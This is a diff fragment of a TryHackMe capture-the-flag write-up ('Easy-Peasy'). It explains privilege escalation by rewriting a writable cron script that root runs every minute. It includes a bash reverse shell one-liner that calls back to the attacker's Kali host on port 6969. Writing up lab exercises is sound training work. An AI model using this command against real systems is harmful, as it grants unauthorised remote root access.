kurohat/writeUp/TryHackMe/Easy-Peasy.md

 ```
 if you do not know what cronjob is, pls look it up.
 In short each 1 min a hidden bash script call `.mysecretcronjob.sh` is executed by root. the script is located at `/var/www/`. lucky the script is own by our current user which mean we have a permission to read and write the script.

-The plan is modify the script to a reverse shell to gain root access. add this to the script
+The plan is modify the script (`.mysecretcronjob.sh`) to a reverse shell to gain root access. add this to the script
 ```sh
 bash -i >& /dev/tcp/<kali ip>/6969 0>&1
 ```